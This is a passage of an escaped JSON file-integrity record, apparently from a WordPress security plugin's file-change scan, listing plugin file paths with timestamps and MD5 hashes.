":\"a2233a59a644d837a9a881dc450d6f66\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/archiver\\/class-ai1wm-extractor.php\":{\"d\":1535620872,\"h\":\"e0a1a71bb7a775a31537505ac6887b8c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/archiver\\/class-ai1wm-compressor.php\":{\"d\":1535620872,\"h\":\"6c5ca8ab9756f6494036eda708868746\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filter\\/class-ai1wm-recursive-extension-filter.php\":{\"d\":1535620872,\"h\":\"5a89fe06cb5216cbc317cad07b1f0f72\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filter\\/class-ai1wm-recursive-exclude-filter.php\":{\"d\":1535620872,\"h\":\"8c2452ebd4411439f546f59b94c507ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filter\\/class-ai1wm-recursive-newline-filter.php\":{\"d\":1535620872,\"h\":\"fa24fe824e0323144c8b6210cb45883e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file-index.php\":{\"d\":1535620872,\"h\":\"92570d0c7cf2f53b4969664f5b07c4c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file.php\":{\"d\":1535620872,\"h\":\"3084b882a07239a3802971a4391c1935\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file-webconfig.php\":{\"d\":1535620872,\"h\":\"9c2246b10d90d450b174c09e6a22163c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-directory.php\":{\"d\":1535620872,\"h\":\"91a325fc2e24575f6ec23e399bfea8a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/filesystem\\/class-ai1wm-file-htaccess.php\":{\"d\":1535620872,\"h\":\"a2a07a27854ec8f2de5daf925d2cb964\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/iterator\\/class-ai1wm-recursive-iterator-iterator.php\":{\"d\":1535620872,\"h\":\"acc05768b35769495114ff1452f160c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/vendor\\/servmask\\/iterator\\/class-ai1wm-recursive-directory-iterator.php\":{\"d\":1535620872,\"h\":\"cff36e5e05654e926706559e209b9ae2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/loader.php\":{\"d\":1535620872,\"h\":\"765a0809e6d7d7ff79a2bf9002ef4cb4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/constants.php\":{\"d\":1535620872,\"h\":\"c225909db69ffa58066c839113762437\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/exceptions.php\":{\"d\":1535620872,\"h\":\"5ce00bfb726b56c657530b5ca4b5be8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/readme.txt\":{\"d\":1535620872,\"h\":\"d88c8b17295baef9a37c7b5b73f038cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/all-in-one-wp-migration.php\":{\"d\":1535620872,\"h\":\"36814902c57ea9618d106f64758a8a7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/functions.php\":{\"d\":1535620872,\"h\":\"45d58f55f918aafc2951cd5bd1d1d04d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/changelog.txt\":{\"d\":1535620872,\"h\":\"ea22038c125cfad8052f283a205835d7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/uninstall.php\":{\"d\":1535620872,\"h\":\"58b457e63bd94569fedf4d2cd4cc1822\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/deprecated.php\":{\"d\":1535620872,\"h\":\"d62804f3846a8009045dc30afbb7e7ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/LICENSE\":{\"d\":1535620872,\"h\":\"ed35246d9c78e0ad6c9bfdcc5094e425\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/js\\/additional-methods.js\":{\"d\":1534138308,\"h\":\"9d89d88aeb0d0b779e0c01f88919a1c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/js\\/jquery.validate.min.js\":{\"d\":1534138308,\"h\":\"9346ec27896981bc4c0b146cf327727a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/js\\/ap-tabs.js\":{\"d\":1534138308,\"h\":\"8f755b58efa613e48edf00620fe82352\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/js\\/jquery.cookie.js\":{\"d\":1534138308,\"h\":\"185607df1287788a379739a0fbf95fae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_login_log_adds.php\":{\"d\":1534138308,\"h\":\"aca11febbad927aed37c1cdfc70093e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_login_log.php\":{\"d\":1534138308,\"h\":\"230a4c857948b73c567b0bd7da9eb3fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_message.php\":{\"d\":1534138308,\"h\":\"2efb9c4cedadaf8c55b2573c89fe2ab0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_paginate.php\":{\"d\":1534138308,\"h\":\"53207063ee322dc83a4359af93c55792\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_login_form.php\":{\"d\":1534138308,\"h\":\"3b866b54131f8b1b06df93b4e54b7a85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_form.php\":{\"d\":1534138308,\"h\":\"e8b1ab34d755d51f86c2e45ab64df362\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_settings.php\":{\"d\":1534138308,\"h\":\"d5500120abb34fdaf0f0d4088de92266\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_security.php\":{\"d\":1534138308,\"h\":\"f3c94f1c1d9e9d60e4680f2b592fa446\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/includes\\/class_forgot_password.php\":{\"d\":1534138308,\"h\":\"fb4b6db63397249bfc20c25fc5ba1d9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/AntykwaBold.ttf\":{\"d\":1534138308,\"h\":\"b9106ffe9631b4ab2e28f3d7accc48a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/StayPuft.ttf\":{\"d\":1534138308,\"h\":\"59299d5b871590f70b455395c244e8d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/Duality.ttf\":{\"d\":1534138308,\"h\":\"0a28056baf1a5d86a8b822236462b7cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/TimesNewRomanBold.ttf\":{\"d\":1534138308,\"h\":\"ed6e29caf3843142d739232aa8642158\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/Candice.ttf\":{\"d\":1534138308,\"h\":\"9c7bc61ece0a61a85b6e8a59bebef3d2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/Heineken.ttf\":{\"d\":1534138308,\"h\":\"fbe82ed64fbbd2fef712ad10fc2be7cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/VeraSansBold.ttf\":{\"d\":1534138308,\"h\":\"4ebf664c986099acf6d151c62bdb24eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/Ding-DongDaddyO.ttf\":{\"d\":1534138308,\"h\":\"7bc55743d12c71e4594f4b6b918f8917\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/fonts\\/Jura.ttf\":{\"d\":1534138308,\"h\":\"33a1ce8894390c3ccf3ad9d0971ccfff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/captcha\\/captcha.php\":{\"d\":1534138308,\"h\":\"35b9b0522800e5c16869c5ffaf454157\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/config\\/config_emails.php\":{\"d\":1534138308,\"h\":\"f39cc5a0b22959706b0966c44bf41a00\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/config\\/config_default_fields.php\":{\"d\":1534138308,\"h\":\"a87af53bfdda1badfefc2664dcf56962\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/css\\/style_login_admin.css\":{\"d\":1534138308,\"h\":\"54beec92603c25b6e88100ec6acb3aba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/css\\/style_login_widget.css\":{\"d\":1534138308,\"h\":\"f80abe422586819234fade661a82a76f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/login_afo_widget_shortcode.php\":{\"d\":1534138308,\"h\":\"5b21bef26aa391b432872dcf0046b0c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/readme.txt\":{\"d\":1534138308,\"h\":\"7527c5f005ecb159cb2f38a4514a63f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/login.php\":{\"d\":1534138308,\"h\":\"8a0c4370482ddfbabcf5e452b85a5987\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/functions.php\":{\"d\":1534138308,\"h\":\"6c446e1280679fd2e5b656bea97ce4bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/login_afo_widget.php\":{\"d\":1534138308,\"h\":\"ba7b8404c6cfd9eb1af5ae38b9c0e0c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/process.php\":{\"d\":1534138308,\"h\":\"b003a97d65e3e52e609cd3895fd7f799\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/login-sidebar-widget\\/wpml-config.xml\":{\"d\":1534138308,\"h\":\"4d982663bf2648148264b516826a7514\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/display\\/class-styles.php\":{\"d\":1534138328,\"h\":\"cbf7548283bdb7acd994f0a91b9f928c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/js\\/customizer-controls\\/customizer-controls.js\":{\"d\":1534138328,\"h\":\"49c903abfe478151fc2189a77ae4ebe7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/js\\/customizer-controls\\/auto-save-form.js\":{\"d\":1534138328,\"h\":\"9cb10cc22e67f2590bebcf5fe271c9e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/js\\/live-preview\\/live-preview-changes.js\":{\"d\":1534138328,\"h\":\"78323484c7d4857f0ff38698aac439e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/js\\/live-preview\\/edit-shortcuts.js\":{\"d\":1534138328,\"h\":\"37aa58afd3f7bbce5661cef99d66996e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/js\\/frontend.js\":{\"d\":1534138328,\"h\":\"36e513cc6f5d21d3c290765ba8dc2502\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/dropdown-fields.php\":{\"d\":1534138328,\"h\":\"ed7c28442a15b83122cabc3cde9558cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/radio-inputs.php\":{\"d\":1534138328,\"h\":\"3d6304e3ba427b7fe33865da95649d0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/field-labels.php\":{\"d\":1534138328,\"h\":\"eab2fe11c30d6e9da7fb649a166a2c57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/placeholders.php\":{\"d\":1534138328,\"h\":\"b26a00aa58b77d258da7ffeec7beacb7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/form-header.php\":{\"d\":1534138328,\"h\":\"10b02698eb72a3de5a3bf326863aa8cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/section-break-title.php\":{\"d\":1534138328,\"h\":\"79f11503b3c53c6595b8d8f5a762ad40\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/text-fields.php\":{\"d\":1534138328,\"h\":\"86252ff259b18f85cb6e73463ecf6153\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/general-settings.php\":{\"d\":1534138328,\"h\":\"e20b0334eb51a72afa8c1615602225f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/form-title.php\":{\"d\":1534138328,\"h\":\"0bfc160e4bfaec0ec89772a94fdb81f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/confirmation-message.php\":{\"d\":1534138328,\"h\":\"3682a5f1766cd00b128add7575bf7192\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/outer-shadow.php\":{\"d\":1534138328,\"h\":\"a9e028b57ae7d16d245aee3024d5d44e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/checkbox-inputs.php\":{\"d\":1534138328,\"h\":\"fc08513c7be575bba9afa070795bfc76\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/customizer-addons.php\":{\"d\":1534138328,\"h\":\"a8fc7a0030479222daf49bbd03f3d1e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/list-field.php\":{\"d\":1534138328,\"h\":\"4dce436904a35eebc9076109477b6ec7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/section-break-description.php\":{\"d\":1534138328,\"h\":\"9568d5bc179df5bf837cb02d0ee04917\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/error-message.php\":{\"d\":1534138328,\"h\":\"e37a824f0e894ba08541ebeff8d2e493\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/field-sub-labels.php\":{\"d\":1534138328,\"h\":\"df860b26869a9f286b5e63d3938a6392\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/paragraph-textarea.php\":{\"d\":1534138328,\"h\":\"2eca68dde7c4626335d1e919ce320060\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/submit-button.php\":{\"d\":1534138328,\"h\":\"4de628fad9a69d00cfb8582bec63342f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/form-select.php\":{\"d\":1534138328,\"h\":\"6c52b3e3c66ffa82a69b5d6432e59c7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/field-descriptions.php\":{\"d\":1534138328,\"h\":\"2279a4de94a90b89b55953432cd40f91\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/form-wrapper.php\":{\"d\":1534138328,\"h\":\"3aeb6ae2d165a469190f34898db0a327\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/form-description.php\":{\"d\":1534138328,\"h\":\"a61d800899b78bec38efdcda6b44b95f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/includes\\/inner-shadow.php\":{\"d\":1534138328,\"h\":\"45679c2d58f044fdee04b237d298e526\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/admin-menu\\/addons.php\":{\"d\":1534138328,\"h\":\"058380a203ca85243e679bb078793a8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/admin-menu\\/welcome-page.php\":{\"d\":1534138328,\"h\":\"26ddd2beaab82a804c5096c648561a2c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/admin-menu\\/licenses.php\":{\"d\":1534138328,\"h\":\"d33ce5b8849090d150537af4f967879f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/admin-menu\\/EDD_SL_Plugin_Updater.php\":{\"d\":1534138328,\"h\":\"f575192d30e22d1e3d227138cc594a7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/tab-text-input.php\":{\"d\":1534138328,\"h\":\"3bf4e06b405e26e3f4879fc52769aa94\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/desktop-text-input.php\":{\"d\":1534138328,\"h\":\"ee09b566929aa2402e68fa10b38729af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/text-alignment.php\":{\"d\":1534138328,\"h\":\"8758974ce7b08417030bb180a784b8b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/margin-padding.php\":{\"d\":1534138328,\"h\":\"3df72221512462a7a0eeb29de9936655\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/font-style.php\":{\"d\":1534138328,\"h\":\"30195a1a6dbfa19e6a572b5278f7131d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/range-slider.php\":{\"d\":1534138328,\"h\":\"2043bc4c8434024276325334ab50de90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/custom-controls.php\":{\"d\":1534138328,\"h\":\"76da362bdbedaa92486305b7ed49c40d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/customizer-controls\\/mobile-text-input.php\":{\"d\":1534138328,\"h\":\"b2bc7f26d130cf53c697735f8d5a3719\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/views\\/html-template-preview.php\":{\"d\":1534138328,\"h\":\"c742ddcb7aedb252ba6f5f896c8463af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/helpers\\/fonts.php\":{\"d\":1534138328,\"h\":\"55502f49277f7222db950494c4dc744d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/css\\/customizer\\/stla-customizer-controls.css\":{\"d\":1534138328,\"h\":\"86fe07d1a7fa76f36c43c5834bf343e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/css\\/live-preview.css\":{\"d\":1534138328,\"h\":\"0559b815c6f78fce732768be0d1306ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/css\\/customizer-controls.css\":{\"d\":1534138328,\"h\":\"84a9c599276213e864597d23df0e1769\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/readme.txt\":{\"d\":1534138328,\"h\":\"f334c373b98d75386ef30ad40dbe2791\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/styles-and-layouts-for-gravity-forms\\/styles-layouts-gravity-forms.php\":{\"d\":1534138328,\"h\":\"f9a492682bcf0ee9976452fd2a7af3ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/tracking.js\":{\"d\":1535620875,\"h\":\"af44ef090dd429c67ab3c5b0ca0fa42b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-global-settings.js\":{\"d\":1535620875,\"h\":\"cd77355904d3c8c275c20a04a333c23e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-dashboard-footer.js\":{\"d\":1535620875,\"h\":\"d1ea81a598b60670cd986f8e621ce017\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-dashboard.js\":{\"d\":1535620875,\"h\":\"699b0e443a57f28d7a3e669d640d40ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-modal.js\":{\"d\":1535620875,\"h\":\"b9c2a320342943bd484d3a4aeee105b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/admin-logs.js\":{\"d\":1535620875,\"h\":\"69ffc55192426976cbf0f4883c1ca4da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/scrollTo.js\":{\"d\":1535620875,\"h\":\"6e19f467120770d4c405f2272388a7ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/js\\/itsec-notice.js\":{\"d\":1535620875,\"h\":\"4f566a5505d833da48dc12c6a4829f68\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/script.js\":{\"d\":1535620875,\"h\":\"d43b87a8940fdb9e1aaebf00309e7551\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/debug.js\":{\"d\":1535620875,\"h\":\"757a161cd1a0657cc3401042d3b1db6b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/settings.js\":{\"d\":1535620875,\"h\":\"d641663a8d9d87343d51b79a06d04084\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/logs.js\":{\"d\":1535620875,\"h\":\"ca09b6a8322118de2cd75bfb8e9fd658\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/util.js\":{\"d\":1535620875,\"h\":\"e3e8b5b493788b8bb14c33f3db3dc9d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/css\\/style.css\":{\"d\":1535620875,\"h\":\"316974884ea6a1633698e55a92e8574a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-go-pro.php\":{\"d\":1535620875,\"h\":\"09e7587c3929aa53201bf7f0c62b1c7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-settings.php\":{\"d\":1535620875,\"h\":\"32b5ebeafa1576adc0b554f8b86aec1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/module-settings.php\":{\"d\":1535620875,\"h\":\"1c5b4e4b3d02802f656fbaacfb3c8c20\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/index.php\":{\"d\":1535620875,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/sidebar-widget.php\":{\"d\":1535620875,\"h\":\"168ff582a863841c2410749ec954f737\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-security-check.php\":{\"d\":1535620875,\"h\":\"e2debdd7a0b1c2154239264bef6f683f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-debug.php\":{\"d\":1535620875,\"h\":\"3a6828e70cbdba92b6f930a96feac443\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/logs-list-table.php\":{\"d\":1535620875,\"h\":\"866f3b1062e070110c2ff00ee5d5b69d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-logs.php\":{\"d\":1535620875,\"h\":\"1b0b0d86e7fece237ecc4c9e15140861\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/init.php\":{\"d\":1535620875,\"h\":\"262bce31796699aef9a3946d42052f0d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/brute-force\\/